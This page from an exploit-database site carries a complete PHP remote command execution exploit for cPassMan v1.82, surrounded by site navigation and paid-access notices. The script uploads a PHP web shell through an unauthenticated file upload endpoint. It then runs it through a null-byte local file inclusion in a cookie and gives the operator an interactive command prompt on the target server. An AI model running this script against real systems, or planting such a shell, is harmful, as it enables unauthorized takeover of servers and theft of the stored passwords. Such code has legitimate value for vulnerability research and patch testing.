0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
cPassMan v1.82 Remote Command Execution Exploit
[Product. Collaborative Passwords Manager (cPassMan)
Platform. Independent (PHP)
Affected versions. 1.82
<?php
/*
* cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)
* Disclaimer: cPassMan developer was notified of vulnerabilities in April 2011 and advised that v1.x was no longer supported.
* Note: Requires PHP 5.3.3 or lower due to the use of a poison null byte in the LFI.
*/
if ($argc < 3) {
print "Usage: php -f {$argv[0]} <host> <path> (e.g. php -f {$argv[0]} 192.168.129.130 /cpassman)\n";
exit();
}
print "--------------------------------------------------------------------------------\n";
print "cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)\n";
print "--------------------------------------------------------------------------------\n";
$host = $argv[1];
$path = $argv[2];
$port = 80;
/*
* Stage One: Unauthenticated Arbitrary File Upload
* Uploaded files are stored in the document root of the web server as a file with the MD5 hash of the original filename.
*/
print "[*] Stage One: Uploading command execution handler... ";
$upload_path = $path . "/includes/libraries/uploadify/uploadify.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
if ($fp) {
fputs($fp, "POST $upload_path HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-Type: multipart/form-data; boundary=---------------------------4827543632391\r\n");
fputs($fp, "Content-Length: 233\r\n\r\n");
fputs($fp, "-----------------------------4827543632391\r\n");
fputs($fp, "Content-Disposition: form-data; name=\"Filedata\"; filename=\"rabbit.txt\";\r\n");
fputs($fp, "Content-Type: text/plain\r\n\r\n");
fputs($fp, "<?php echo system(\$_GET['z']); die(); ?>\r\n");
fputs($fp, "-----------------------------4827543632391--\r\n\r\n");
$result = fgets($fp, 16);
fclose($fp);
}
if (strstr($result, "200 OK")) {
print "Success!\n";
}
/*
* Stage Two: Local File Inclusion
* Several LFI vulnerabilities exist in the user language selection functionality. The exploit uses the user_language cookie attack vector.
*/
print "[*] Stage Two: Confirming command execution via local file inclusion... ";
$cmd = "echo rabbit";
$success = FALSE;
$stdin = fopen("php://stdin","r");
do {
$cmd = str_replace(" ", "+", $cmd);
$lfi_path = $path . "/index.php?z=" . $cmd;
$fp = fsockopen($host, $port, $errno, $errstr, 30);
if ($fp) {
fputs($fp, "GET $lfi_path HTTP/1.1\r\n");
fputs($fp, "Host: 192.168.129.130\r\n");
fputs($fp, "Cookie: user_language=../../../89f84a8775dd8f60cdbdef0d73919511%00\r\n");
fputs($fp, "Content-Length: 0\r\n\r\n");
for ($i = 0; $i < 13; $i++) {
fgets($fp, 2048);
}
$output = "\n";
while (($tmp = fgets($fp, 2048)) != FALSE && !feof($fp)) {
$output .= $tmp;
}
if ($success) {
echo $output;
}
fclose($fp);
}
if (!$success && strstr($output, "rabbit")) {
$success = TRUE;
print "Success!\n";
}
print "\n> ";
} while ($cmd = trim(fgets($stdin)));
?>
# 0day.today [2024-12-26] #